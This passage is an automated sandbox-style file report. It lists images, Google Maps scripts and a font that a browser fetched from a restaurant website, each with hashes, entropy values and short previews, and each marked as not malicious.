                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=440, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=550], progressive, precision 8, 2000x843, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):182091
                                                                                                                                                    Entropy (8bit):7.952907456537648
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:tc2c3XjKReeIs3MB7UNDIATd6ybIyhk+AOhKZYORFWbq5K+7ZBT30AvhElhy55y2:tc2cnjxeGkbTLlhk+iZvRFWbm0VsOXQT
                                                                                                                                                    MD5:D86B00C3ED730F6A28665E8E3F1D19EB
                                                                                                                                                    SHA1:946CE827FBF59760C68BD3A654A7E6CEEF3C34A1
                                                                                                                                                    SHA-256:F043818CE6C49A55EE964DBDB9A0A2FBC9DFF54AD171CE725610E6E13749181E
                                                                                                                                                    SHA-512:9438FACA97063F1C4E10E93E152C33429DD7594210B584D89DD9D00E5B98A49FFE65100A7363715B9ECFBA24BACFCD0F01AE99337C3134BED88CFED4ADE1EA9F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/header_4.jpg
                                                                                                                                                    Preview:......Exif..MM.*...............&.......................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:31:21.............0221..................................K...............................r...........z.(.................................w.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................C...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......'.&.....S..W9..!.].w5.].~......z.?T..5;.......c..5....{.....7c>.!...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):121594
                                                                                                                                                    Entropy (8bit):7.90625593988897
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:ufpLXfpLDuef6+ffzOBPxg+vHKPHo3XHyYk/oh2rc1T1d:ufpf5f6+3zWPxg+iPHoH1aczd
                                                                                                                                                    MD5:DE9B5A06878175121CEC74478176EF2E
                                                                                                                                                    SHA1:71429B6F15984A09C50F79724A200A4E25C75C54
                                                                                                                                                    SHA-256:6A962CA1BD977FD3D53B9E96CAE8ADB817F4B4F7E91E9D56EAEF0D8D1EF4C372
                                                                                                                                                    SHA-512:94C1747A1808FDDE9BE544805311A691F251D037A9995344096693DF31DE424945D1D00974FDD8F7DC9DBCBBB94AA484B2DECA6CC7DBDFC7E07967C5619121CC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.....aExif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:41:14....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................68..........68..........68..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................P........2023:08:19 16:43:49.2023:08:19 16:43:49.+10:00.+10:00.+10:00...`........................#.................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (3664)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):296574
                                                                                                                                                    Entropy (8bit):5.4789881757349805
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:587K0nBdQUUiaWlA8c+NgYCsGsRthM7aSaQ/2pQVrrl/BM9NXuC2r:587K0nBdQUUiaN8cFYlM7aSas2pQVrrj
                                                                                                                                                    MD5:263B942BC5E51BD9868FC0E2CAEA89A0
                                                                                                                                                    SHA1:894341592CC3BCD96287651D2A32F4B7C6DE85CA
                                                                                                                                                    SHA-256:1729747AE6545E8764A8BB3D0529ABB8681587FA816A9D7857B84D406BCB5AD2
                                                                                                                                                    SHA-512:0B0F81624489AB0720CCD2B486546BFC350EC8D13929D43127B219F28D8A07728923A17A912E732E24A9FF631E605F2B5138F0EAD86585F0A87CE3508CE8479A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:google.maps.__gjsload__('common', function(_){var ija,mq,kja,lja,oja,nq,pja,rq,tq,wq,qja,rja,sja,tja,uja,Jq,wja,xja,Mq,Oq,Pq,Cja,Dja,Qq,Tq,Eja,Ija,Hja,Mja,Pja,zr,Ir,Jr,Sja,Lr,Tja,Uja,Vja,Wja,Xja,Yja,Zja,$ja,dka,eka,fka,gka,hka,Pr,Qr,ika,Rr,jka,Sr,kka,Tr,Wr,Yr,mka,nka,pka,oka,tka,uka,wka,Fs,yka,Aka,Cka,Qs,Gka,vt,Pka,Rka,Qka,Vka,Wka,Zka,$ka,ala,Zt,eu,fla,fu,iu,gla,ju,hla,mu,pla,Au,tla,Bu,ula,vla,xla,zla,yla,Bla,Ala,wla,Cla,Dla,Gu,Ela,kma,oma,qma,sma,Gma,ena,hna,lna,mna,una,vna,wna,xna,Bna,zna,xx,yx,Dna,Ena,Fna,Gna,Hq,Gq,mja,nja,yja,Aja,Bx,Fja,.Ina,qw,rw,Jna,pma,pw,sw,Jja,Kja,tma,Lja,Ex,Kna,Gx,Hx,Lna,Mna,Ona,Jx,Pna,Qna,Lx,Mx,Rna,Sna,Ox,Tna,Px,Una,Vna,Sx,Wna,Xna,Yna,Wx,Zna,$na,Yx,Zx,$x,ay,aoa,boa,coa,doa,aka,cka,ioa,joa,koa,loa,moa,ey,gw,poa,qoa,roa,rka,bs,toa,Mma,dna,Xma,Dka,Ks;_.jq=function(a){return!!a.handled};_.kq=function(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var d=c.slice();d.push.apply(d,arguments);return a.apply(this,d)}};._.hja=function(a,b){functio
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=862, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1284], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):115418
                                                                                                                                                    Entropy (8bit):7.9321681222709985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:MY8AarvY8Aar89Ze6v1rBkyOUSaTtytlo3QT+:X2w283PfkyOMktW3Q6
                                                                                                                                                    MD5:DA8E7F6025CFF61338E147288F5B9FA8
                                                                                                                                                    SHA1:5CC4029EC01921B2BBA6D654458F1F15F0D6CA28
                                                                                                                                                    SHA-256:511D4BB7516D9DBCB28AFFBE19DE92C98D5CD4BBEC63F4D5601F6F3524F3525C
                                                                                                                                                    SHA-512:CE5B67B403DCC9081C9CDE51EEFC0889CAF9778B580A3E0A9C0E9FB135B3F93A6624DE61695E2E6A0C2AB53350A2A74EE2BC350BEE71F67ECD5D8CB095A37DDB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-6.jpg
                                                                                                                                                    Preview:..../JExif..MM.*...........................^...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:22 19:32:27.............0221...................................................................r...........z.(................................-........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...L..d.e.p...O.sl..87.W.....d...X$..ikD.n.%.......sk$..s...>...B...z...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (3664)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):296574
                                                                                                                                                    Entropy (8bit):5.4789881757349805
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:587K0nBdQUUiaWlA8c+NgYCsGsRthM7aSaQ/2pQVrrl/BM9NXuC2r:587K0nBdQUUiaN8cFYlM7aSas2pQVrrj
                                                                                                                                                    MD5:263B942BC5E51BD9868FC0E2CAEA89A0
                                                                                                                                                    SHA1:894341592CC3BCD96287651D2A32F4B7C6DE85CA
                                                                                                                                                    SHA-256:1729747AE6545E8764A8BB3D0529ABB8681587FA816A9D7857B84D406BCB5AD2
                                                                                                                                                    SHA-512:0B0F81624489AB0720CCD2B486546BFC350EC8D13929D43127B219F28D8A07728923A17A912E732E24A9FF631E605F2B5138F0EAD86585F0A87CE3508CE8479A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/common.js
                                                                                                                                                    Preview:google.maps.__gjsload__('common', function(_){var ija,mq,kja,lja,oja,nq,pja,rq,tq,wq,qja,rja,sja,tja,uja,Jq,wja,xja,Mq,Oq,Pq,Cja,Dja,Qq,Tq,Eja,Ija,Hja,Mja,Pja,zr,Ir,Jr,Sja,Lr,Tja,Uja,Vja,Wja,Xja,Yja,Zja,$ja,dka,eka,fka,gka,hka,Pr,Qr,ika,Rr,jka,Sr,kka,Tr,Wr,Yr,mka,nka,pka,oka,tka,uka,wka,Fs,yka,Aka,Cka,Qs,Gka,vt,Pka,Rka,Qka,Vka,Wka,Zka,$ka,ala,Zt,eu,fla,fu,iu,gla,ju,hla,mu,pla,Au,tla,Bu,ula,vla,xla,zla,yla,Bla,Ala,wla,Cla,Dla,Gu,Ela,kma,oma,qma,sma,Gma,ena,hna,lna,mna,una,vna,wna,xna,Bna,zna,xx,yx,Dna,Ena,Fna,Gna,Hq,Gq,mja,nja,yja,Aja,Bx,Fja,.Ina,qw,rw,Jna,pma,pw,sw,Jja,Kja,tma,Lja,Ex,Kna,Gx,Hx,Lna,Mna,Ona,Jx,Pna,Qna,Lx,Mx,Rna,Sna,Ox,Tna,Px,Una,Vna,Sx,Wna,Xna,Yna,Wx,Zna,$na,Yx,Zx,$x,ay,aoa,boa,coa,doa,aka,cka,ioa,joa,koa,loa,moa,ey,gw,poa,qoa,roa,rka,bs,toa,Mma,dna,Xma,Dka,Ks;_.jq=function(a){return!!a.handled};_.kq=function(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var d=c.slice();d.push.apply(d,arguments);return a.apply(this,d)}};._.hja=function(a,b){functio
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1024, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=768], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):55111
                                                                                                                                                    Entropy (8bit):7.81478196799974
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:kUFhNUFhGCBLRZkFCbgoAynZNJj0Uo1KkgT:kUFhNUFh9LRZb/AynZjfv
                                                                                                                                                    MD5:F65CCF316CEE2CC9C8DCA8F35FE75158
                                                                                                                                                    SHA1:AC02D0F8D7EBCD3E49EA6D2D98342978D5AEC9C0
                                                                                                                                                    SHA-256:5229A3298872C67377774C2F086A0FBCF6A3FA5546F104B2B79E95C5DC93A117
                                                                                                                                                    SHA-512:07A7C13A012DF17F7AB54D5DC1EB66424D4CA08C7FDB182E910616C69BA8B32FE061187B43FFB72DF9FDB34D45AD91D90BDD359B495804DC19F74165947705B2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_new3.jpg
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:12:28 00:05:14.............0221...................................................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....fe....SWV.;+t5........jWf.....F..3.......]WL...K2:..X73...G....#.+...@*
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=2109, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=500], baseline, precision 8, 500x2109, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):199934
                                                                                                                                                    Entropy (8bit):7.956706330896888
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:T9zV0canqiplJi5FLiwb+1/00KXXq+r1MW:FWcanqipXiaf1/0j6+hMW
                                                                                                                                                    MD5:2225C906075C629DAAC652D1B2CEA958
                                                                                                                                                    SHA1:AAAC9799C16AD24666F90917B7DA88E52E8813B7
                                                                                                                                                    SHA-256:AE6566E0B4CD08494D7D46D3EE9D3E5EE5DCD56EAE16F2D2719F0A42E602A2D6
                                                                                                                                                    SHA-512:D883CACE747C9317A216CCC8A3ED143A26F6C7E58FF6E60320AFA182221307DD9D80A5F298ECD53B912745794124AD48240B059E32F6819C3B7899299B77B188
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.....qExif..MM.*...........................=...........................................................................(...........1.....".....2..........i.............$.......-....'..-....'.Adobe Photoshop CC 2015 (Windows).2023:09:27 17:27:16.............0221...................................=...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................&.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..1..VS..zw<....s.;Y.h.s~...b.~..[...{.......Lz{..k.........F...p...5....Ii
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):84519
                                                                                                                                                    Entropy (8bit):7.362853143856596
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:XwNaGSIiv9M1bNQJ054Arplz/ZSxpMcWir62rpbV8z1C:3GSPMD5vLTZWLJpwC
                                                                                                                                                    MD5:814FA8AE7E9E83E8BCABCE6795DCF059
                                                                                                                                                    SHA1:EDFAC4CF8DC5C88ECD2BB0C14D26850403084CE1
                                                                                                                                                    SHA-256:9DF93DF6F7CA991AB7E8C88B141D679B5989358917683F612564D050DEB5BDE0
                                                                                                                                                    SHA-512:6BD9D24F1F55101E9272747FEBD2E36AA581E63F50E43A6CB9CCF78B9DBD1C7C9CD9FF6CB81849FF7A4E7FFE222951986804D801B21A4916330217AE3F58D9C0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/cook_dinner.png
                                                                                                                                                    Preview:.PNG........IHDR.............=..2....pHYs...............?ciTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:0e66a276-0cae-11ed-a552-baea9d3ae441</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:437dfe83-6d85-8b
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 440x560, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):86437
                                                                                                                                                    Entropy (8bit):7.90140782578948
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:5MM35w1TKYMM35w1TKJtbCBdEQb6llW67j5VaXEhj15SBAKS2ztU4/B40Nar:5MM35kNMM35k3BNb6llW47BTISqZ40Mr
                                                                                                                                                    MD5:1EB207E821A0EE9FEEFEACBC071E6C70
                                                                                                                                                    SHA1:DB8544FFD1F10606E8E4B52F762D528AE36D3210
                                                                                                                                                    SHA-256:AC312EAE2E2E3F1CA496870CFA17F9D6B8B0710BD08747C4DDB05CE0094D496F
                                                                                                                                                    SHA-512:355140069A2DB6A2F1552F8AFEAF83CFE86699284168FEC7B8915803E91836BE29162FEC1D5CCCEB7AC65E41A1663BF16AAD6C5D7BCD498F249353A9ADAAA592
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/special-menu-3.jpg
                                                                                                                                                    Preview:....+"Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 18:15:13.............0221...................................0...............................r...........z.(................................)........H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................~.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......:OZa......z.,...o....o.....vYM..M.gt.....Wa.m....=..o...7.......U.=2.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 102 x 77, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):38979
                                                                                                                                                    Entropy (8bit):6.009310132625517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:P50wGdDiWks5LU5a9yPOUaRqv/RJuI16FUmcFfa/mTJSOQfmNuq:RcdDiWhU5kyPOUaAEI1hFfauNPzf
                                                                                                                                                    MD5:41D56A8BB55216FAF45D4402C8545463
                                                                                                                                                    SHA1:2BC3D76E1A3D33AF5450A73250076CC12121644A
                                                                                                                                                    SHA-256:1C2AA9763FA6D1DAEB63B6D760B52A7652ECFCA54EAE2FE7E9986FE87BA06782
                                                                                                                                                    SHA-512:F568876AB9FD0C525FCBF8714C3312ADC9FDE7E7448C2F169D550B50CC7DE2F2F45DE369C0BDB44504AFBBE1E2F1EFA05A60A737847B1CDB140C9633903FB1DA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Mixed_Kabab_Skewers.png
                                                                                                                                                    Preview:.PNG........IHDR...f...M.....T.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (554)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):184994
                                                                                                                                                    Entropy (8bit):5.631569490379207
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:YxTjNm8H2AO+yNwbuQjTgkK6Drm545DtsdayPnR5t1P2/6FzgAEY7N3D0OTFOu/b:YxTPWAO+yNwSQngkKWy545ydaqnR5tlJ
                                                                                                                                                    MD5:09E687964AECC32424F69065C6E09E01
                                                                                                                                                    SHA1:B8D3F468CA1EB45F21FC919564FAD50089B072AE
                                                                                                                                                    SHA-256:A55663C398778C3399E0BCB628DE29B8C4040611F00E8F996A7FEBF0CA0B3F84
                                                                                                                                                    SHA-512:BA389AB20D835938602484CB87B6D57A0D73271FA54DE81E57781524B6847BA06B88E0DE492CAF72E5035D6D8A1105F58D3EF85392B13DE53CC5DE1B1B6ADDD8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/util.js
                                                                                                                                                    Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var Zya,aza,cza,dza,eza,fza,hza,OC,QC,RC,jza,lza,UC,nza,VC,pza,WC,rza,qza,sza,tza,uza,vza,wza,xza,yza,zza,Aza,Bza,Cza,Dza,Eza,Fza,Gza,Hza,Iza,Jza,Kza,$C,Nza,bD,Oza,Pza,Qza,Rza,Sza,Tza,Uza,Vza,Wza,Xza,Yza,$za,bAa,dAa,fAa,hAa,jAa,lAa,nAa,pAa,rAa,sAa,tAa,uAa,vAa,wAa,xAa,yAa,cD,zAa,AAa,BAa,CAa,DAa,EAa,GAa,eD,fD,HAa,IAa,JAa,KAa,LAa,MAa,NAa,OAa,PAa,QAa,RAa,gD,SAa,hD,TAa,UAa,VAa,WAa,XAa,YAa,ZAa,iD,$Aa,jD,aBa,bBa,cBa,dBa,eBa,fBa,gBa,hBa,iBa,jBa,kBa,lBa,mBa,nBa,oBa,pBa,qBa,rBa,sBa,uBa,vBa,wBa,yBa,lD,zBa,ABa,.BBa,CBa,DBa,EBa,GBa,JBa,KBa,MBa,PBa,QBa,RBa,ED,FD,GD,TBa,ID,JD,KD,LD,ND,VBa,OD,WBa,XBa,YBa,PD,QD,RD,SD,TD,ZBa,$Ba,aCa,cCa,dCa,UD,eCa,bCa,hCa,iCa,$D,mCa,qCa,rCa,sCa,cE,tCa,vCa,wCa,xCa,yCa,fE,ACa,FCa,oE,ICa,HCa,qE,JCa,sE,LCa,MCa,NCa,PCa,QCa,RE,SCa,SE,TCa,UCa,VCa,WCa,UE,YCa,XCa,ZCa,aDa,cDa,eDa,iDa,gDa,jDa,hDa,VE,WE,mDa,nDa,XE,YE,ZE,aF,bF,cF,pDa,eF,fF,qDa,gF,rDa,hF,iF,sDa,jF,kF,tDa,lF,zD
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=415, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=739], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):96307
                                                                                                                                                    Entropy (8bit):7.91511279960392
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:Q+TN3y+TN37rYLO1wgYz/Yh72LWI8kQR5/Bn25Peo6Asvef+d0VvzeAfF:Q+A+WLO1FYzAZO29jpn25mLefS0JekF
                                                                                                                                                    MD5:0A8C36EB6E77CB0CABF88EBF1B395FC1
                                                                                                                                                    SHA1:31B96AB5735C550421B60EC46905EC7E7FBE198A
                                                                                                                                                    SHA-256:C4EFDE3E6632DAFE09E8C990BEE489B795B35DF8DB89A5D745E87C29C4A3CB2E
                                                                                                                                                    SHA-512:991E24B52F1F7EF1EBB561B98B434EB5D74B375075883AAB52D72D8A5C0CB2A40531671CAE655F0AE25D3D4336F30AE29CBEA4AC2F9BB5D9AFD898ABEF087B7C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....+.Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:59:59.............0221...................................................................r...........z.(................................*........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..~3...4V.j\.J.1+.L.P9....r.h}.q}......O...zk}].2.Ag.wY..#.....N....w...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (906)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):2675
                                                                                                                                                    Entropy (8bit):5.3343911471610905
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:D1+kqj0watiHZDYWcjPlmVoTimWyWCk5OhcKMy01FiSxvQhIKsoXwyRn:D1+Z0waH5PQlldO6KMSSxtrewyRn
                                                                                                                                                    MD5:41E499E0599AB53FCFC0C2CACD6520BF
                                                                                                                                                    SHA1:B79D0C9317CF5BE6F5353B02E07B842FB4B6E48D
                                                                                                                                                    SHA-256:D0713279F74A920D9CF7143B4B34F69EF184BF2E0060CF3AC30AE2A993F7761D
                                                                                                                                                    SHA-512:D3591133A3475D456A68B2DA8E916C516AC63774FD9F046668A6BA442E32784C59971EF27D1FD1D3365AB05B37F9F8AEBDA88531340BA93E53060577D3166738
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/search.js
                                                                                                                                                    Preview:google.maps.__gjsload__('search', function(_){var wva=function(){},WB=function(a){this.setValues(a);_.Qi("search_impl")},yva=function(a){let b=_.nl,c=-1;a.tiles.forEach(e=>{e.zoom>c&&(b=e.fi,c=e.zoom)});if(c===-1)return[];const d=[];a.Du().forEach(e=>{e.a&&e.a.length>=2&&d.push(new xva(e,b,c))});return d},zva=function(a){const b=[];a.data.forEach(c=>{b.push(...yva(c))});return b};_.Ga(wva,_.rk);var Ava={["1"]:{}},xva=class{constructor(a,b,c){this.Jp=b;this.zoom=c;this.bounds=this.anchor=null;this.Eg=Ava;this.source=a;this.featureId=this.source.id||"0";this.infoWindowOffset=(this.source.io||[]).length===2?new google.maps.Point(this.source.io[0],this.source.io[1]):null}getAnchor(){if(!this.anchor){const a=1<<this.zoom;this.anchor=_.Rl(new _.cm((this.Jp.x*256+this.source.a[0])/a,(this.Jp.y*256+this.source.a[1])/a)).toJSON()}return this.anchor}getCompleteBounds(){return this.getBounds().reduce((a,.b)=>{a.extendByBounds(b);return a},_.Vl(0,0,0,0))}getBounds(){if(this.bounds===null){this.bou
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:Web Open Font Format, CFF, length 56108, version 1.0
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):56108
                                                                                                                                                    Entropy (8bit):6.26938440516179
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:tImTAHYFg71fAWsOKi5qSy5LBaK+mn2noN5IO3RCtebWA8ipCWUa:GmTp0gpBpv2a58oSA81
                                                                                                                                                    MD5:A1ECC3B826D01251EDDDF29C3E4E1E97
                                                                                                                                                    SHA1:9394F35BD2ADDD24666B79BFC36D4F9D247CB01D
                                                                                                                                                    SHA-256:0DB5C5A1475EB7A3E5028983EA1E642D1B2C00FAFF6A250A37502B0F3832A4A7
                                                                                                                                                    SHA-512:2329063D667B5480A2862FE4E11154B4DABF3B8782FD67BE79EBFE55BFDA96E28E70F8F438F73C7EF9901AFCB16370897C3022C8B649A33CB74459C610CCA00A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/vendors/themify-icons/fonts/themify.woff?-fvbane
